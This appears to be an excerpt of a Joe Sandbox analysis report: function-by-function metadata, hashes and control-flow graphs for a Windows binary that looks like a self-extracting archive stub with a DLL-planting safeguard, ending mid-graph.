                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWideswprintf
                                                                                        • String ID: $%s:$CAPTION
                                                                                        • API String ID: 2100155373-404845831
                                                                                        • Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                        • Instruction ID: 68cc76716d87b0572f3b3c7c1c7027f2d5f91ff5fe6773d4c7a6c7cbb95f6615
                                                                                        • Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                        • Instruction Fuzzy Hash: 8E91B672F1864286E714DF2AA80066EBBA1FBD4784F445535FE5D97B98EE3CE805CB00
                                                                                        Function 00007FF6FE1A8624 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 101memorywindowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                        • String ID: PNG
                                                                                        • API String ID: 211097158-364855578
                                                                                        • Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                        • Instruction ID: dc6e0d4a43d924d1f842795150475b6da666e3faf18668a6b37d8cb23a15e456
                                                                                        • Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                        • Instruction Fuzzy Hash: 33410925F19A0281EB05DB979848379ABA0AFE8F94F044435EA2DC77E4FE7CE449C700
                                                                                        Function 00007FF6FE18F930 Relevance: 17.2, APIs: 8, Strings: 1, Instructions: 1417COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID: __tmp_reference_source_
                                                                                        • API String ID: 3668304517-685763994
                                                                                        • Opcode ID: d0e6c7c07de011f9d1d4fd04177219c70b4fe0a47e1a326b15a4d61e2b0fa1d9
                                                                                        • Instruction ID: e8a9b6851ef125d4d252e07a5119b3822a39255ca6bd9ff45a11dbe7ab2c636a
                                                                                        • Opcode Fuzzy Hash: d0e6c7c07de011f9d1d4fd04177219c70b4fe0a47e1a326b15a4d61e2b0fa1d9
                                                                                        • Instruction Fuzzy Hash: DBE27562E0C6C192EB64CB26E1403AE6B61FBE5750F444132EBAD936E9EF3CE555C700
                                                                                        Function 00007FF6FE184840 Relevance: 12.1, APIs: 5, Strings: 1, Instructions: 1624COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID: CMT
                                                                                        • API String ID: 3668304517-2756464174
                                                                                        • Opcode ID: 3621ef844e84e6c8b5ed89fe876b50e8c17ab69de9b061cb775712f64666389b
                                                                                        • Instruction ID: 23fdf40e2ebab8debc3d1e3bff14b8d910fda463783ecec617927178775378c6
                                                                                        • Opcode Fuzzy Hash: 3621ef844e84e6c8b5ed89fe876b50e8c17ab69de9b061cb775712f64666389b
                                                                                        • Instruction Fuzzy Hash: 35E2DF22F0C68286EB18DB66D4502FD6BA1FBA5784F440135EA6E877D6EF3CE655C300
                                                                                        Function 00007FF6FE1940BC Relevance: 10.7, APIs: 7, Instructions: 153fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 3856 7ff6fe1940bc-7ff6fe1940f3 3857 7ff6fe1941d2-7ff6fe1941df FindNextFileW 3856->3857 3858 7ff6fe1940f9-7ff6fe194101 3856->3858 3861 7ff6fe1941e1-7ff6fe1941f1 GetLastError 3857->3861 3862 7ff6fe1941f3-7ff6fe1941f6 3857->3862 3859 7ff6fe194103 3858->3859 3860 7ff6fe194106-7ff6fe194118 FindFirstFileW 3858->3860 3859->3860 3860->3862 3863 7ff6fe19411e-7ff6fe194146 call 7ff6fe196a0c 3860->3863 3864 7ff6fe1941ca-7ff6fe1941cd 3861->3864 3865 7ff6fe194211-7ff6fe194253 call 7ff6fe1b797c call 7ff6fe18129c call 7ff6fe198090 3862->3865 3866 7ff6fe1941f8-7ff6fe194200 3862->3866 3878 7ff6fe194167-7ff6fe194170 3863->3878 3879 7ff6fe194148-7ff6fe194164 FindFirstFileW 3863->3879 3868 7ff6fe1942eb-7ff6fe19430e call 7ff6fe1b2320 3864->3868 3892 7ff6fe194255-7ff6fe19426c 3865->3892 3893 7ff6fe19428c-7ff6fe1942e6 call 7ff6fe19f168 * 3 3865->3893 3870 7ff6fe194202 3866->3870 3871 7ff6fe194205-7ff6fe19420c call 7ff6fe1820b0 3866->3871 3870->3871 3871->3865 3880 7ff6fe194172-7ff6fe194189 3878->3880 3881 7ff6fe1941a9-7ff6fe1941ad 3878->3881 3879->3878 3883 7ff6fe1941a4 call 7ff6fe1b220c 3880->3883 3884 7ff6fe19418b-7ff6fe19419e 3880->3884 3881->3862 3885 7ff6fe1941af-7ff6fe1941be GetLastError 3881->3885 3883->3881 3884->3883 3887 7ff6fe194315-7ff6fe19431b call 7ff6fe1b7904 3884->3887 3889 7ff6fe1941c0-7ff6fe1941c6 3885->3889 3890 7ff6fe1941c8 3885->3890 3889->3864 3889->3890 3890->3864 3895 7ff6fe19426e-7ff6fe194281 3892->3895 3896 7ff6fe194287 call 7ff6fe1b220c 3892->3896 3893->3868 3895->3896 3899 7ff6fe19430f-7ff6fe194314 call 7ff6fe1b7904 3895->3899 3896->3893 3899->3887
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                                                        • String ID:
                                                                                        • API String ID: 474548282-0
                                                                                        • Opcode ID: 3ee96c9aed3c94a745cca2dc02a0ae9902b722a9ff44476fc619c6065aa41b54
                                                                                        • Instruction ID: b03f5d262f62fcb6ef0d914dcd4243f20c7f64da041266a7e5f70a36a165aeac
                                                                                        • Opcode Fuzzy Hash: 3ee96c9aed3c94a745cca2dc02a0ae9902b722a9ff44476fc619c6065aa41b54
                                                                                        • Instruction Fuzzy Hash: CA617162E0864681EB10DB2AE88026D6761FBE97A4F505331FABD877D9EF3CE554C700
                                                                                        Function 00007FF6FE185E24 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 586COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: CMT
                                                                                        • API String ID: 0-2756464174
                                                                                        • Opcode ID: 92e72442b0651b6fe78cc2a3e1d7e8b257f9506ac908177fd119fb022d21258c
                                                                                        • Instruction ID: 26ddd335371aae9232a6afbe46dbba2b75ec333509daafc5b254e180404d735f
                                                                                        • Opcode Fuzzy Hash: 92e72442b0651b6fe78cc2a3e1d7e8b257f9506ac908177fd119fb022d21258c
                                                                                        • Instruction Fuzzy Hash: 3842A362F0C68196EB18DB76D1512FD7BA1EBA1744F400136EB6E936D6EF38E658C300
                                                                                        Function 00007FF6FE1A1F20 Relevance: .3, Instructions: 337COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d815108fe1d55ff87d4c2cc37bd82faefe2d830e8a86587ef2118bcfed6bbcfe
                                                                                        • Instruction ID: 5fbe3f283542cb50294a156bccd4216b51280bb8c71c8c5e529d6c0f9b2ff6b2
                                                                                        • Opcode Fuzzy Hash: d815108fe1d55ff87d4c2cc37bd82faefe2d830e8a86587ef2118bcfed6bbcfe
                                                                                        • Instruction Fuzzy Hash: 5DE1C762E4828246EB74CF2AA04427D7B91FBA4B48F054135EB6EC77C5EE3CE559C704
                                                                                        Function 00007FF6FE1A3484 Relevance: .3, Instructions: 302COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8c3f9089be966249862bf56ce032710d6eb03eb50aa34be6e58aa05575d530c2
                                                                                        • Instruction ID: 5e4258a9ce81ef1b048c98820c4eb5252ea7f564bd65706c64b5bc9281db599e
                                                                                        • Opcode Fuzzy Hash: 8c3f9089be966249862bf56ce032710d6eb03eb50aa34be6e58aa05575d530c2
                                                                                        • Instruction Fuzzy Hash: 9EB1BFA2B04B8952DF58DA6695087FDA791BB95FC4F488036EE2D87781EF3CE159C300
                                                                                        Function 00007FF6FE194928 Relevance: .1, Instructions: 136COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                        • String ID:
                                                                                        • API String ID: 3340455307-0
                                                                                        • Opcode ID: b898a5790bc13ce9467efc73a41fb0efef5aff7df3bcc575331cae3ab7ee1eec
                                                                                        • Instruction ID: 4999e7b9d743b2c2a3c4cb620f20def4a12992c89a3a5940bc413689d39459e4
                                                                                        • Opcode Fuzzy Hash: b898a5790bc13ce9467efc73a41fb0efef5aff7df3bcc575331cae3ab7ee1eec
                                                                                        • Instruction Fuzzy Hash: 9741E522F1566686FB64DE23E99076E2A52BBD4788F044030EE5E877D8EE3CE456C704
                                                                                        Function 00007FF6FE19DFD0 Relevance: 143.9, APIs: 16, Strings: 66, Instructions: 440libraryfileloaderCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 7ff6fe19dfd0-7ff6fe19e024 call 7ff6fe1b2450 GetModuleHandleW 3 7ff6fe19e026-7ff6fe19e039 GetProcAddress 0->3 4 7ff6fe19e07b-7ff6fe19e3a5 0->4 7 7ff6fe19e053-7ff6fe19e066 GetProcAddress 3->7 8 7ff6fe19e03b-7ff6fe19e04a 3->8 5 7ff6fe19e503-7ff6fe19e521 call 7ff6fe196454 call 7ff6fe197df4 4->5 6 7ff6fe19e3ab-7ff6fe19e3b4 call 7ff6fe1bb788 4->6 20 7ff6fe19e525-7ff6fe19e52f call 7ff6fe1951a4 5->20 6->5 14 7ff6fe19e3ba-7ff6fe19e3fd call 7ff6fe196454 CreateFileW 6->14 7->4 11 7ff6fe19e068-7ff6fe19e078 7->11 8->7 11->4 22 7ff6fe19e4f0-7ff6fe19e4fe CloseHandle call 7ff6fe181fa0 14->22 23 7ff6fe19e403-7ff6fe19e416 SetFilePointer 14->23 27 7ff6fe19e531-7ff6fe19e53c call 7ff6fe19dd88 20->27 28 7ff6fe19e564-7ff6fe19e5ac call 7ff6fe1b797c call 7ff6fe18129c call 7ff6fe198090 call 7ff6fe181fa0 call 7ff6fe1932bc 20->28 22->5 23->22 25 7ff6fe19e41c-7ff6fe19e43e ReadFile 23->25 25->22 29 7ff6fe19e444-7ff6fe19e452 25->29 27->28 39 7ff6fe19e53e-7ff6fe19e562 CompareStringW 27->39 67 7ff6fe19e5b1-7ff6fe19e5b4 28->67 32 7ff6fe19e800-7ff6fe19e807 call 7ff6fe1b2624 29->32 33 7ff6fe19e458-7ff6fe19e4ac call 7ff6fe1b797c call 7ff6fe18129c 29->33 50 7ff6fe19e4c3-7ff6fe19e4d9 call 7ff6fe19d0a0 33->50 39->28 42 7ff6fe19e5bd-7ff6fe19e5c6 39->42 42->20 45 7ff6fe19e5cc 42->45 48 7ff6fe19e5d1-7ff6fe19e5d4 45->48 52 7ff6fe19e63f-7ff6fe19e642 48->52 53 7ff6fe19e5d6-7ff6fe19e5d9 48->53 60 7ff6fe19e4ae-7ff6fe19e4be call 7ff6fe19dd88 50->60 61 7ff6fe19e4db-7ff6fe19e4eb call 7ff6fe181fa0 * 2 50->61 56 7ff6fe19e7c2-7ff6fe19e7ff call 7ff6fe181fa0 * 2 call 7ff6fe1b2320 52->56 57 7ff6fe19e648-7ff6fe19e65b call 7ff6fe197eb0 call 7ff6fe1951a4 52->57 58 7ff6fe19e5dd-7ff6fe19e62d call 7ff6fe1b797c call 7ff6fe18129c call 7ff6fe198090 call 7ff6fe181fa0 call 7ff6fe1932bc 53->58 82 7ff6fe19e661-7ff6fe19e701 call 7ff6fe19dd88 * 2 call 7ff6fe19aae0 call 7ff6fe19da98 call 7ff6fe19aae0 call 7ff6fe19dc2c call 7ff6fe1a87ac call 7ff6fe1819e0 57->82 83 7ff6fe19e706-7ff6fe19e753 call 7ff6fe19da98 AllocConsole 57->83 107 7ff6fe19e62f-7ff6fe19e638 58->107 108 7ff6fe19e63c 58->108 60->50 61->22 72 7ff6fe19e5ce 67->72 73 7ff6fe19e5b6 67->73 72->48 73->42 99 7ff6fe19e7b4-7ff6fe19e7bb call 7ff6fe1819e0 ExitProcess 82->99 94 7ff6fe19e7b0 83->94 95 7ff6fe19e755-7ff6fe19e7aa GetCurrentProcessId AttachConsole call 7ff6fe19e868 call 7ff6fe19e858 GetStdHandle WriteConsoleW Sleep FreeConsole 83->95 94->99 95->94 107->58 112 7ff6fe19e63a 107->112 108->52 112->52
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                                                                        • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                        • API String ID: 1496594111-2013832382
                                                                                        • Opcode ID: 468c4a7f069b7598ff125167d5f4f846522f64d48354b40e84144950afa66450
                                                                                        • Instruction ID: 1f20a0cf61f1a2ed900ce10f2bf4b256339a6ad55362259f5a4294d328ef3cad
                                                                                        • Opcode Fuzzy Hash: 468c4a7f069b7598ff125167d5f4f846522f64d48354b40e84144950afa66450
                                                                                        • Instruction Fuzzy Hash: 9C32FA35E09B8299EB11DF66E8801E937A4FFA4354F500236EA6D867A9FF3CD255C340
                                                                                        Function 00007FF6FE1998DC Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 702COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF6FE198E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6FE198F8D
                                                                                        • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6FE199F75
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6FE19A42F
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6FE19A435
                                                                                          • Part of subcall function 00007FF6FE1A0BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6FE1A0B44), ref: 00007FF6FE1A0BE9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                                                        • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                        • API String ID: 3629253777-3268106645
                                                                                        • Opcode ID: 137a8823fd4522e36ba74be14e40dc9d8de557d7e1016f60fbe5fb59c02e5768
                                                                                        • Instruction ID: 38a935dc60006b9bd097c48db63c4cbded262daed61f1a1d4eb0ea9530f7754c
                                                                                        • Opcode Fuzzy Hash: 137a8823fd4522e36ba74be14e40dc9d8de557d7e1016f60fbe5fb59c02e5768
                                                                                        • Instruction Fuzzy Hash: 1A629F22F1968295EB10DB26D4442BD7B65FBA4784F804231FA6E876E9FF3CE549C340
                                                                                        Function 00007FF6FE1B1900 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 195libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1910 7ff6fe1b1900-7ff6fe1b1989 call 7ff6fe1b1558 1913 7ff6fe1b19b4-7ff6fe1b19d1 1910->1913 1914 7ff6fe1b198b-7ff6fe1b19af call 7ff6fe1b1868 RaiseException 1910->1914 1916 7ff6fe1b19d3-7ff6fe1b19e4 1913->1916 1917 7ff6fe1b19e6-7ff6fe1b19ea 1913->1917 1922 7ff6fe1b1bb8-7ff6fe1b1bd5 1914->1922 1919 7ff6fe1b19ed-7ff6fe1b19f9 1916->1919 1917->1919 1920 7ff6fe1b1a1a-7ff6fe1b1a1d 1919->1920 1921 7ff6fe1b19fb-7ff6fe1b1a0d 1919->1921 1923 7ff6fe1b1ac4-7ff6fe1b1acb 1920->1923 1924 7ff6fe1b1a23-7ff6fe1b1a26 1920->1924 1930 7ff6fe1b1a13 1921->1930 1931 7ff6fe1b1b89-7ff6fe1b1b93 1921->1931 1926 7ff6fe1b1adf-7ff6fe1b1ae2 1923->1926 1927 7ff6fe1b1acd-7ff6fe1b1adc 1923->1927 1928 7ff6fe1b1a28-7ff6fe1b1a3b 1924->1928 1929 7ff6fe1b1a3d-7ff6fe1b1a52 LoadLibraryExA 1924->1929 1932 7ff6fe1b1b85 1926->1932 1933 7ff6fe1b1ae8-7ff6fe1b1aec 1926->1933 1927->1926 1928->1929 1935 7ff6fe1b1aa9-7ff6fe1b1ab2 1928->1935 1934 7ff6fe1b1a54-7ff6fe1b1a67 GetLastError 1929->1934 1929->1935 1930->1920 1942 7ff6fe1b1bb0 call 7ff6fe1b1868 1931->1942 1943 7ff6fe1b1b95-7ff6fe1b1ba6 1931->1943 1932->1931 1940 7ff6fe1b1aee-7ff6fe1b1af2 1933->1940 1941 7ff6fe1b1b1b-7ff6fe1b1b2e GetProcAddress 1933->1941 1944 7ff6fe1b1a7e-7ff6fe1b1aa4 call 7ff6fe1b1868 RaiseException 1934->1944 1945 7ff6fe1b1a69-7ff6fe1b1a7c 1934->1945 1936 7ff6fe1b1ab4-7ff6fe1b1ab7 FreeLibrary 1935->1936 1937 7ff6fe1b1abd 1935->1937 1936->1937 1937->1923 1940->1941 1947 7ff6fe1b1af4-7ff6fe1b1aff 1940->1947 1941->1932 1946 